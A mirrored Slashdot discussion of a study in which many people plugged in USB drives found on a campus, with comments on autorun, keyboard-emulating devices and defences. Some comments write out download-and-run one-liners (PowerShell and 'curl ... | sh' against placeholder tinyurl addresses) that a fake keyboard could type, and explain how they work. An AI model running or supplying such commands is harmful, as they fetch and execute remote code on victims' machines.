Slashdot Mirror
A Lot of People Carelessly Plug In Random USB Drives Into Their Computers (vice.com)
An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.
Never know what STDs are there, but YOLO
People are stupid, film at 11.
Just cruising through this digital world at 33 1/3 rpm...
The chance of getting juicy selfies are a lot higher than getting infected.
Kind of like picking up an unknown person in a bar and having sex. Maybe even better odds or not getting infected. The study did not compare this.
don't cut it off www.mgmbill.org
Does Windows still run things automatically from external media. I thought that had been changed in Win 7.
Disable auto run always, never open executables outside of your Vm, what's the problem?
This is what my old PIII box is for, testing suspicious devices and software.
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
What is with this 'story' ?
Does Windows 7 or 8/8.1 or 10 auto-run from removable media?
Does OS X 10.x ?
Does Linux?
1) Given: People will take a random USB stick and plug it into a computer.
2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.
The minimal convenience of having auto-run for USB drives is far over-ridden by the huge security leak.
Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.
excitingthingstodo.blogspot.com
I'd like to see OS source code that protects against this:
http://arstechnica.com/security/2015/10/usb-killer-flash-drive-can-fry-your-computers-innards-in-seconds/
The problem is that the OS will automatically run a program that can install malware from a USB stick.
Hmm? None of the desktop environments I use on my PCs do anything like that, at least not by default. That would be idiocy! The most they do is automatically mount the USB stick, but they certainly don't run anything from it.
I suppose I can guess that yet again, this is something Microsoft decided would be a good idea, similar to how "email viruses" went from being a joke to something that existed in the real world?
Let's not cast the blame too wide. "The OS" doing that means "one specific OS with notoriously poor security for exactly these reasons". If you elect to use that OS, fine - you can even use it securely, and many people manage to, you just have to be careful.
There is a scene in Mr. Robot where a girl dumps a bunch of infected USB stick in the parking lot of a police station, and a cop picks one up and plugs it into his computer. I thought this was rather far-fetched, but I guess not.
I feel sorry for people that don't drink, because when they get up in the morning, that's as good as they're gonna feel
I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.
USB drives?!
How about blindly trusting USB chargers from Alibaba/ebay?!
Or assuming that new USB-C cable from Amazon won't set your house on fire?!!!
the preceding comment is my own and in no way reflects the opinion of the Joint Chiefs of Staff
I heard of dropping random USB sticks in public places (10?) years ago for testing security (IIRC in the context of testing banks). That along with strategically dropping CD's in the bathrooms of companies with the CD's marked something like "Super secret HR layoff plan"
I am Slashdot. Are you Slashdot as well?
people picking up random hookers and plugging into them.
by TheSpoom (715771) Uncaring Linux user here. I have nothing to add to this but please continue. *munches popcorn*
This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that doesn't require an obviously too trusting OS such as the most popular one that continues in this manner well after the idea has been well and truly discredited.
In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do what you tell it to", and so on, and so forth. It's the industry that's at fault because all that "stupid stuff" the users do, we keep on telling them that it's quite right and go ahead... right up until we chastise them for having fallen for a scam or a virus or whatever. "Sure you can do that", 'but now the box is bleeping angrily', "don't do that then." Worst pavlov training ever.
So no, you really cannot blame "people" for this, nor "users". It's the engineers and perhaps moreso the companies employing the engineers.
You quickly drive through the employee parking\entry area of a bank. You toss half a dozen, maybe less, infected USB drives out your window on the way. I've only ever heard of that testing method used on banks, by genuine, hired security firms, but I imagine it could go a lot further. Needless to say it generally results in "Yay! free USB drives! Let's plug em in!" Then something phones home.
People are simple like that. Every so often someone asks me what the best way to crack (misc.) password is. I tell them to ask for it.
Brought to you by Carl's Junior.
Well, who can resist, I know I can't.
It's a lot safer to try this if you're running Linux or BSD, since at least a Windows .exe can't run. Still, suppose some sort of cross-platform malware is on there?
Might be good to boot off a burner machine with a livecd and nothing important on the HDD before trying this...
"a USB stick given away at a trade show is automatically good." the hell ever gave you that idea? a USB stick in original packaging could have malware all up ins for all you know.
Some years ago at a company I worked at, our hardware vendor came on site and wanted to inspect/service some machines in our racks. I walked him into our data center while he was about to stick in a USB key into one of our master database servers. I was like "whoa whoa don't stick anything in there" and he was adamant about doing it, saying he needed to run some diagnostics or some such. So I refuse, and walk him out of the data center. Then my boss (the DBA) ended up escorting him in and watching over him. Stuck the USB key in, database crashed, RAID array failed. Still not exactly sure what happened to create that happen except that it created a lot of work for me.
That's why we have USB authorization. Since 2007.
What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?
Oh right, Windows. Well, there's your problem.
-Forrest Cameranesi, Geek of all Trades
"I am Sam. Sam I am. I do not like trolls, flames, or spam."
Blame the OS? Nope. I'll blame the Operator, not the Operating System.
Consistency is only a virtue if you're not a screw-up.
The intro says: "The problem isn't that people are idiots..."
Let's stop right there. I know for a fact that this premise is wrong.
As a Canadian, I cannot trust either China nor the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.
Probably, and college students probably don't have corporate security training. It's much more interesting when the thumb drives are dropped outside a supposedly secure business.
There's no way to secure college networks at endpoints owned by students. The security needs to happen elsewhere.
Just look at how people will engage in sex with another human not knowing when or with whom that human has last had sex with. 72% of the population doesn't deserve to live due to their carelessness.
The sun rose in the East today and set in the West. More at 11.
If it ain't broke, don't fix it.
...They say that Stuxnet got deployed like this. Awesome hack, Stuxnet....
Staff secretly dropped computer discs and USB thumb drives in the parking lots of government buildings and private contractors. Of those who picked them up, 60 percent plugged the devices into office computers, curious to see what they contained. If the drive or CD case had an official logo, 90 percent were installed....
I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.
Just a quick question.
Suppose the device identifies as a USB keyboard, or identifies as a dual use device USB stick/keyboard?
Suppose the keyboard device is generic, doesn't require a driver, and the micro on the USB stick starts to type things on your computer.
Could that install malware on your system?
(Of course, I didn't need to identify keyboard devices specifically. There are a bunch of devices that a USB device can identify as, some of which allow data to be loaded onto your computer.)
Commvault gave away as swag a few years ago (2011 I believe), a device that looked like a common trade show USB key. However instead of being an actual useful USB key, (it wasn't even a storage device) it behaved like a USB keyboard, upon loading, hit winkey - R, and typed in a webpage, (you could see the letters type across the screen). When I first saw those, it wasn't hard to imagine how easily those could be abused for just this scenario. Heck, you could theoretically have it do all kinds of sneaky things in the background as a keyboard input. All you needed to do is plug it in, and it will run. Doesn't matter about auto-mounting or Auto-run since it's not a storage device, but a "keyboard". Other OSes could theoretically be susceptible to it as well since most OSes can take keyboard commands.
The people that pick up a USB drive will ofcourse stick it in their computer. There arent many other reasons why you would pick it up in the first place.
What I'm more curious about is how the researchers determined what happened after picking it up. Did they have software on it that phoned home (hacking) or did they follow the person (stalking) and question them later.
Why on Earth is this story under 'It's Funny. Laugh.'? Or are topics meaningless now?
Did they account for people who opened and looked at the USB key, but their computer did not auto-run whatever was on there that phoned home? What about people who have the auto-run disabled in Windows, or people who run a smarter OS, like perhaps Linux or Mac or BSD? (I'm not actually sure if these OS's are smarter than Windows, but it seems like they might be.)
-- ssoorrrryy,, dduupplleexx sswwiittcchh oonn.. -Quote found on actual fortune cookie.
In 1989, people would plug random floppies into their computers. At least one early computer virus was spread that way. The more things change...
I have mixed feelings every time I see this. Every time I see one of these articles come across, there's a flood of comments about how its not news, and each time I see it I lean closer to the notion that this paradox of "non-news" that in and of itself is caused by a lack of awareness(which can only be remedied by news) might be dragging along by the dead weight of our habit to only share this knowledge with the tech crowd that already knows about it. This knowledge can only do so much unless it makes its way to those people who keep on asking me to reset their password because they forget that caps lock is on.
It has a small chance to have porn content, or at least, nudes! I can take that risk!
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
Yeah right.
Bruce Schneier is partially correct, the OS is at fault, but the bigger problem is that people are idiots. They're hoping that they'll find something juicy on that drive.
I work on a NAVAL base... our security folks gets reports and "found" USB drives ALL THE TIME. like daily.. I find one a week in the off base packing lots just walking in, and yet despite the constant emails about NOT plugging that shit into our networks people do it all the time.
The problem is that the OS will automatically run a program that can install malware from a USB stick.
Mine doesn't. I know of no Linux or BSD machine that automagically runs any kind of +x'ed code on any kind of removable media.
At least not out of the box. Gee, I wonder what OS is designed for "convenience" rather than protecting the user, and their computer.
Does it start with a W?
--
BMO
If you put a floppy in your computer, would it autoplay? No.
Do your external hard drives autoplay when you put them in? Nope!
The issue here is the bullshit autoplay. CDs and DVDs are guilty of that as well. I have no idea why it's a default feature on computers... the default should be to just open the volume like a drive to allow you to peruse the files on the medium and select what you want to open.
IMO this is a HUGE failure on the OS and whoever decided to allow Auto Play to be a thing.
https://motherboard.vice.com/r...
No, the people are NOT stupid.
Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.
The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.
Table-ized A.I.
Yeah right.
I'm not most people, but I did exactly this (with an SD card).
I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.
I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.
She responded and sent her uncle to come pick it up.
He did.
The problem isn't that people are idiots
Yes, it is. Would you pick up a random needle off the street and stick it into your vein, then wonder how you got AIDS? Would you stick your dick in some random person you found behind a 7-11, then wonder how you got the clap? It's not the computers fault you stuck an unknown, infected USB drive in it. Take some responsibility for your actions already. This is absolutely nobody's fault but your own, so stop doing stupid shit and then playing the victim card.
The problem is that it isn't safe to plug a USB stick into a computer.
Bullshit. It's perfectly safe to insert a USB stick into a computer, as long as there's nothing malicious on it. Knowing whether or not there's anything damaging on it is up to you, and there's always a risk (even fresh out of the package), but to imply that all sticks are dangerous is just FUD. I've never picked one up off the street, or met one in a truck stop bathroom, and I've never had a bad experience with a thumb drive. Just use some common sense, and take the proper precautions.
Should we also mock Bruce for saying:-
"The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good."
I would say the latter is still suspect, what with Bad-USB firmware and other stuff, just because someone you trust gives you something, the trust does not extend to the something.
First person to invent a cheap, provably secure, not-already-patent/intellectual-property-encumbered "USB condom" (really, a very small computer) that sits between my computer and a USB stick which disables boot, Windows-auto-run, device-driver shenanigans, and the like gets the win.
--
One of many possible ways to do this:
* Assume the device is a generic USB memory stick. If it's not, fail.
* If it is, attempt to access the files using generic methods. If it doesn't work, fail.
* If it's not a recognized filesystem (fat-variations, ntfs, ext2-variations, possibly others), fail.
* Present the directory-tree to the user's real computer a sub-tree so any files the host sees in the "root" directory as "special" aren't there.
* Present the "device" to the host as read-only.
* Consider simply not presenting well-known files like autorun.exe to the host computer at all.
The hard part will probably be that future USB sticks may not work with today's "USB condoms" as, by definition, the "condoms" would not trust any device-driver-like code that resides on the USB stick. This can be partially mitigated if the USB stick's device-driver-like code is signed and the signer's key is trusted by the "USB condom." But this is not without its own risks.
--
Bonus points if the "USB condom" it also stops hardware trojan horses like the "plug me in and 30 seconds later I'll fry your USB port" devices, even if it has to die in the process.
-------------
Note - I haven't done a Google search - such a thing may already exist. If it's cheap (under $10) and proven to provide protection without doing harm, I'm interested in buying a few.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
I think this story runs once a year, choir having been preached to, problem continues.
I think you have your statistics backwards. The number of people carrying around juicy selfies on a USB stick is considerably lower than the amount of USB sticks containing malware.
Mobile phone may be different.
That seems incredibly likely to me as well.
College students are poor, and their data is very important to them. A lost drive could be difficult to replace, to say nothing of the potential to find countless hours of work lost forever. Any normal person would want to identify the owner and return the drive.
To the Slashdot cynics: Considering all the factors surrounding the drives, don't you think that someone who was already well-aware of the risks of accessing drives of dubious origin would consider the threat minimal? A risk so low that it's better to act as a humanitarian, on the (very high) chance that it would save some poor student a lot of trouble? Wouldn't they hope their fellow students would act similarly, disregarding the pitifully minimal risk to try to return the drive, should they have been the one who had lost one?
Required reading for internet skeptics
My computer doesn't run shit when I plug in a USB drive.
On the other hand, I don't use Windows. Auto-run is the stupidest thing ever invented.
You must be a Republican since you have no concern for others. Every time I have done this, it was to ID the owner. Remember, these drives used to be expensive. College students can't afford to lose $70 flash drives. Even more importantly, these drives often contained someone's only copy of certain files, like papers or worse student grades. It's very possible to lose the drive before you get around to making backups. A good person would try to return the drive, because they'd certainly want their drive returned if they lost it. You can minimize risk by doing the check on someone else's computer, or using OSX or Linux.
Real malicious people drop devices that look like USB sticks, but in reality contain a bank of capacitors that slowly charge then deliver a high voltage mega death zap to your USB port. Those puny TVS designed for static don't stand a chance and it perma fries the entire machine.
You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.
I wonder how often black/grey/white hats have mailed compromised devices to offices.
If you started mailing compromised 5 port switches or something to random offices, especially branch offices, I would bet that lots of them would end up getting plugged in and used.
My wife found a USB key in the parking lot a few years ago... I thought about it, then plugged it into my Linux box (figured the chance of malware targetting Linux was close to nil for me)... turned out it had a pretty good pr0n vid on it. Just sayin'.
"The problem is that the OS will automatically run a program that can install malware from a USB stick."
Um, if it's a *stupid* OS. Most sane operating systems don't have flagrant security holes like AutoPlay enabled by default.
I just make sure the OS doesn't automatically open a software on the usb drive
I'd insert the thing into my FreeBSD computer and explore the files looking for identity of the owner — so that I can try to return it, if possible.
If not, I'll reformat it and keep it. I suppose, it may be possible to attack me — such as by carefully exploiting some unknown vulnerability in the msdosfs.ko or but I doubt it. Not only are they unlikely to exist, even if there is something, exploiting a custom-built kernel is much more difficult than simply kidnap and torture me for secrets. It may crash, but is unlikely to do, what you want.
Maybe, you can get me through libreoffice, which I may try to use to open files identified as office documents, but even that is most unlikely — because the software is custom compiled for the specific -march and with compiler's protection against stack-smashing attacks. Again, you may succeed in crashing it, but not in obtaining anything useful.
The OS is a commercial offering providing, what people pay money to have. People paying for Windows are idiots. I wouldn't voluntarily use it even if it were free...
In Soviet Washington the swamp drains you.
I've had some experience in trying to make macros that would replay keyboard/mouse input in order to run certain applications and execute commands, and it's amazing the kinds of things that can throw it off, even when you're working on a known/controlled system. I bet it'd be possible to make one that, to give an example, if you knew exactly what OS you were using, it would launch the CLI and delete the current user's home folder. I wouldn't bet on getting reliable results doing anything much more complicated than that.
Obligatory link to the BadUSB project, including proof-of-concept:
https://srlabs.de/badusb/
LOL @ appeal to vulcan logic.
Real solid reasoning. Vulcan-like, really.
OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"
True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.
A partial solution would be to display a message and give the user 90 seconds to respond.
"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."
Table-ized A.I.
If I was a college student and found one of these drives, I would definitely plug it in to see what was on it.
Not on MY computer, but it can't be hard to find and unguarded USB port on a college campus.
Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.
"First they came for the slanderers and i said nothing."
Microsoft has smart people, and they say that Autoplay is a FEATURE. Anyone who says otherwise is dumb. Where's your multibillion dollar company to prove you know what you're talking about? Macros that move along with Microsoft Office documents? FEATURE, people. FEATURE.
Seriously, though, mainstream OSes should've had this protection ages ago. The BSDs can be compiled to only recognize certain devices on USB, and, if desired, only the first of each kind (so the keyboard that was recognized at boot can't be "replaced" with a device that appears to be the exact same keyboard).
Just drop some USB devices with certain key wires crossed... bad things are bound to happen.
You don't even need to pick up a random device for this, I've had it happen with store-bought stuff
Every system I build has at least one PS2 Port (Keyboard/Mouse) and I never use a USB keyboard simply because I have so many 101-102 keyboards with number pads. Don't buy any of those stinking crap Quiet keyboards because they don't last worth a damn and no I don't always need a Model M style - have several Compaq keyboards that are membrane that are solidly built with proper key travel.
Personally, I spend a bit more then $2 for decent keyboards and consider it money well spent since employees have fewer problems with them. The big issue I have is being asked where to buy them and twice a year now, I offer my employees the ability to get the same keyboards as the office has at my cost and they tend to take me up on it. Never to many now but I always have a few takers.
Captcha: troubles
Jesus. I probably would have just left it on the ground.
You did see the malicious USB "drive" that was actually a transformer right (developed as an exhibit on how dangerous random USB can be)? It took about a second for it to build up 240V and send it back through the port. First pulse dropped the screen and probably everything else as well, the second pulse killed the whole laptop power system. And it all happened before you could even pull it. It also would keep pulsing until power to the port stopped.
No, the people are NOT stupid.
Thousands upon thousands of years of history disagree.
Just cruising through this digital world at 33 1/3 rpm...
Unfortunately, the most popular desktop OS wasn't designed by Vulcans. It was designed by Ferrengi.
Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
>"The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer."
Really? I have used hundreds of Linux machines for dozens of years. Not a single one has automatically run a program or automatically opened a file from a USB drive. Ever.
I have also plugged into many Android devices- never seen anything run automatically on those either.
Consider this: The USB device emulates a keyboard and a storage device. Then you just have to get it to run some bad code stored inside.
Trying to do much through the GUI could be quite error-prone, though errors are acceptable. The more normal approach would be for the keyboard to run something like this single command for Windows, which tells the OS to download and run a script:
Win+R Invoke-WebRequest tinyurl.com/hfgrhd | powershell.exe
And / or this for Linux and Mac:
Ctrl-Alt+F1 curl http://tinyurl.com/hfhfh | sh
Ctrl-Alt+F7
Powershell or /bin/sh takes over from there - the victim could yank the trojan device out and the malicious script will continue to run in the background.
Schneier's statement, "The problem is that the OS will automatically run a program that can install malware from a USB stick," was out of date when he wrote it back in 2011. Only a few days after his post, he corrected it to say "EDITED TO ADD (7/4): As of February of this year, Windows no longer supports AutoRun for USB drives."
The only issue here is about exploits sitting in files on the stick, which is not much more of a risk than those you can receive via email or web. Sure, the USB stick could emulate a keyboard and try to run a malicious script, but that would be a less reliable hack due to variations in OS, permissions, etc.
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
I'm guilty of this. I get annoyed when people don't put a readme.txt in the root. It's the first thing I do with a device. So far I've been able to contact 2 people and return 3 more. with one that had enough files that I knew what class they took but nothing with their name on it. It's interesting that I've never considered the malware with Windows no longer doing auto run to the great annoyance of my PortableApps install I figured :shrug: what're the chances.
Just another second banana
Yeah right.
I'm not most people, but I did exactly this (with an SD card).
I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.
I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.
She responded and sent her uncle to come pick it up.
He did.
no man.. you're my hero. This is the level of comfort I want to have with file digging.
Just another second banana
Automatic execution is a dumb idea and needs to go away. What is more, the same execution warnings that exist when you directly execute a downloaded file from a browser should exist when you execute a file on an UNKNOWN USB drive. I don't think it would be that hard to flag given USB drives as known and unknown.
And regardless... auto execution remains retarded. Its one of the many things I make sure is disabled on all my systems.
I've decided to stop wasting my time responding to AC trolls/sockpuppets... so if you want a response from me... login.
That's the concept that is proposed as a solution, but it's not trivial to implement. If you've ever tried to boot a machine with no OS on a properly connected drive, or indeed used BIOS, you know that the keyboard functions without needing permission from any operating system.
Specifically, the System Request key (typically Alt-PrntScrn) is used to debug operating systems and CPU hardware. SysRq commands can do things like pause the OS kernel, and dump RAM.
To prevent trojan HID attacks, the motherboard and the OS will need to communicate using some new protocol. The motherboard will have to give the OS an opportunity to block new hardware while the OS prompts the user.
Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.
The problem isn't data drives, so much as devices that look like data drives but also do other more "interesting" things when plugged in. ;)
USB was designed to do many things, data drives was just one use case. USB's flexibility is what allows hackers to hack.
I don't care if it's 90,000 hectares. That lake was not my doing.
Good luck typing Win+R with my Dvorak keyboard layout... Or can HID devices generate actual ascii/unicode symbols rather than scan codes?
Avantslash: low-bandwidth mobile slashdot.
No idea if he has, but it can be done for http://www.aliexpress.com/item...
This meant to say less than $2 and a link to an aliexpress page for an arduino nano knock off.
The love child of a Ferengi and a Pakled might be closer.
Some of what I say is fact, some is conjecture, the rest I'm just blowing out my ass...you guess.
Those things are so cheaply constructed that it is a physical impossibility that they would successfully negotiate a USB data connection.
A Dedicated Charging Port that conforms to the USB Battery Charging specification doesn't need to "successfully negotiate a USB data connection".
That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.
At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.
Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.
My Chromebook has never had this problem. Neither has my Linux workstation.
The statement of USB drives at trade shows as good? Really? I'd only trust if it was handed directly to me by a vendor rep. At a DoD focused conference was a basket "free USB thumbsticks", a couple hundred of them (with auto installed virus and backdoor) on it of course. Took DoD a while to take care of that. Some departments even super glued covers on extra usb ports to prevent reinfection (no joke).
My personal computer is immune as is has only 2 serials rs232 and a parallel port. You should try dropping some 5.25" floppy in order to test my security levels. Check your virus can run along with my DiskOS within 640 KB!
Sent as ripples into the electromagnetic field. No single photon has been harmed in the process.
Actually mine was a treated as a Pro Micro. I think the Nano uses the older chip, which only works as a USB host, not a USB gadget.
Seriously... will people ever learn?
There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:
Win+R powershell -command 'Invoke-WebRequest http...
Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).
Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell ".
The Linux/Unix/Mac version is similar:
curl http://tinyurl.com/hacker | sh
Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.
The researchers dropped 297 USB flash drives on a university campus
Come on. Of course students are going to pick them up.
"a USB stick given away at a trade show is automatically good." Guffaw!
2011 called, they want their Bruce Schneier article back.
Not that it's not a good article, but come on!
That was some epically beautiful nerdiness right there.
How many have seen this error on boot over the years.
keyboard not detected - press F1 to continue.
or one of those http://www.pcworld.com/article/2896732/dont-trust-other-peoples-usb-flash-drives-they-could-fry-your-laptop.html
My Linux docent run anything from usb stick, docent even mount it unless i tell it to do so... :P
The biggest problem isn't automatic execution. The biggest problem here is that the execution is allowed to do whatever the hell it wants, with no complaints from the OS. The reason for this is simple; the overwhelming majority of all windows users log in with full admin privileges by default. Hell more users take the step to disable the password for their (full admin) user than do to take the step to set up a non-admin user for day-to-day use.
If these users were logging in instead as a non-privileged user, then the overwhelming majority of the malware would be neutered to futility.
I have Linux boxes...
I plug it in and format it with ext4. Never had a problem.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
Only if their computer is running Microsoft Windows on Intel hardware. Why is it 'computers' when Windows is involved but when a bug is discovered in say for instance Apple iOS or Linux, there is no problem mentioning the underlying Operating System and Platform - Microsoft Windows - the OS that still can't tell the difference between OPEN and RUN. It doesn't take a scientist to figure this out.
Who remembers the infamous "No keyboard detected. Press F1 to continue.." error message?
'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
lsblk /dev/sdc1 /mnt/dummy /mnt/dummy
mount
ls -l
Slashdot, fix the reply notifications... You won't get away with it...
All of that can be done in software. The only reason we are whining about it is that the system with the problems is closed source and the owners of the system are not open to suggestions.
I meant in this context or case. I thought that was obvious, or are you just joking around?
Table-ized A.I.
No, I'm a Hillary. I have no concern for anybody my husband is screwing, or who reads my email. And yes, I am nearly a Republican.
Well, my motherboard has a button to enter UEFI and jumpers for adding a button you can hit without opening the case. Maybe there should be an OK button as well for new USB devices.
Okay. Perhaps we can rework the original claim to be:
"People are stupid to not know by now that MS is like Ferrengis rather than Vulcans."
Table-ized A.I.
So will any USB stick just automatically run a program? I'm on MacOS10.9.5 will it really just run an application?
Who mounts USB without a no execute flag?
people execute ${RANDOM JAVASCRIPT} (and worse!) from the intarwebs. And our overlords tell us that it's good (quoth the Slashdot:
"There may be more comments in this discussion. Without JavaScript enabled, you might want to turn on Classic Discussion System in your preferences instead." -- and this is one of the extremely positive outliers!).
We are doomed. What to do?
And even users who might on their own have made better decisions then fall victim to network effects. In a world where everybody exchanges information on USB drives, you simply cannot be ‘that guy’ who throws a fit when someone plugs a USB drive in his computer.
So we all happily plug USB drives into our computers, because we have to if we want to eat tomorrow. Even though it's impossible to tell from the outside if it's a USB drive or a USB hub connected to a decoy drive and a remote controlled keyboard.
...going from port to port?
woah... they're should be even more suspect...
http://www.scmagazine.com/ibm-distributed-infected-usb-drives-at-conference/article/170862/
Donald 'Duck' Dunn: We had a band powerful enough to turn goat piss into gasoline.
I do this too. It doesn't do anything to my computers.
Disclaimer: I use linux, suckers...
I didn't, do you have a source? That seems like something that'll be right up my alley
The logical next step on the evolution of Etherkillers.
Its actually easier than that. You plug the usb device in, the computer asks the device what it is and which drivers to use. The device replies "I am malware please download my drivers from xyz or install them from this file I contain".
Universal plug and play has been a serious bug for quite a while.
It's not people who are stupid it's operating system designers. Autoplay should not be.
hopefully you added a nice goatse image on the SD. Can't be too nice.
https://www.grahamcluley.com/2...
The video is somewhat anti-climactic, but there ya go.
Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.
Extra countermeasures for the paranoid.
If a keyboard is not plugged in but a mouse is present, Yes/No dialog box. If neither is plugged in, accept either.
I get annoyed when people don't put a readme.txt in the root.
Hm. Honestly, it had never occurred to me to do this, but that's a good idea. Back in the day of floppies, I'd regularly put contact info on the label in case I lost it, but I never really translated it to USB sticks. I'm more prone to breaking them than losing them, so maybe it doesn't matter anyway, but it's still a good suggestion.
The Quirkz Handbook of Self-Improvement for People Who Are Already Pretty Okay
Perhaps the computer is intend not to have a keyboard and now you put one in, no warning! There is a reason for the 'Press F1' warning in your bios.
So if you go the warning way, you should do it any time you plug it and unplug it AND block the PC until some action has been taken or until it is restored in the old state, e.g. removed the device,
That would mean if you plug in a new keyboard, IT needs to come and enter their password or give the users the authority to do so themselves.
The majority of companies have all USB ports active, so there is that as well.
Don't fight for your country, if your country does not fight for you.
Some of us don't allow autorun, and so we're not worried about something executed on load.
On BSD at least, you can lock the install to a specific USB keyboard ID, so then it won't accept a random HID.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
I meant in this context or case. I thought that was obvious, or are you just joking around?
Sometimes even I can't tell. ;)
Just cruising through this digital world at 33 1/3 rpm...
Oh, that's a good solution.
"First they came for the slanderers and i said nothing."
Those who use a real computer, can run USBGuard: https://dkopecek.github.io/usb...
It provides a very simple way to control the devices that are allowed to hook to your machine via a kernel security feature that has been there for many a year: https://www.kernel.org/doc/Doc...
Excuse me, but please get off my Pennisetum Clandestinum, eh!
How many have seen this error on boot over the years.
keyboard not detected - press F1 to continue.
It makes sense to me. Keyboard not detected.. plug in keyboard.. press F1 to keep booting.
That message always came up but it never hanged the system for me; did this actually pose a problem on older hardware?
I keep an old laptop for this kind of thing. It doesn't have any useful data on it or a live network connection and it won't run Windows malware, so it's pretty low risk. My users know to bring drives they find to me, not plug them into their own hardware. I have not found any hostile programs but have made a couple people happy by returning their lost drives.
Because Microsoft at least used to act as if it were alone in the world, much like IBM before it. Back in the mid-70s, if you saw a reference to "computers" or "mainframes" you'd think about an IBM mainframe.
"When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
When the device is plugged in, have the OS show a random countdown between 10-60 seconds. While that dialog is active, the OS monitors the power-button. If the user taps the power-button at the right moment, that signifies confirmation and the mouse/keyboard is trusted.
If the power-button is pressed too late or too early, it's an error, the dialog goes away, and the user needs to unplug+replug to try again.
If the user already has a keyboard or mouse connected, they can bypass the dialog that way too.
If the power-button is not practical, another possibility is to use the *unplugging of the device* as a trigger, if the OS can remember the identity of the device.
Uni students are the dumbest people on planet earth. Especially with IT. Its not a valid test to use a university population as subjects.
Yes but Vulkans are very logical and program all non-systems code in Haskell or Ada so the don't have bugs. In real life, the barrier between code and data is not well maintained, meaning specially crafted files can launch from exploits in thumb-nailing or preview programs.
And a really nasty USB device might emulate a keyboard and monitor, use the keyboard to set up a second monitor, and run exploits just as well as if the hacker had access to the unlocked workstation.
It should be interesting what more can be done on the new USB-C connections that have USB and Thunderbolt, as they will have access to the PCI-e bus directly.
APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
When in college, I found someone's flash drive. It had been run over by a vehicle, so I got the email address from a resume and emailed them the field with a note about the hardware being destroyed. Never much thought much about it, but this was 15+ years ago.
APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
Is that true on a college campus though where people use the USB sticks for all their files?
APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
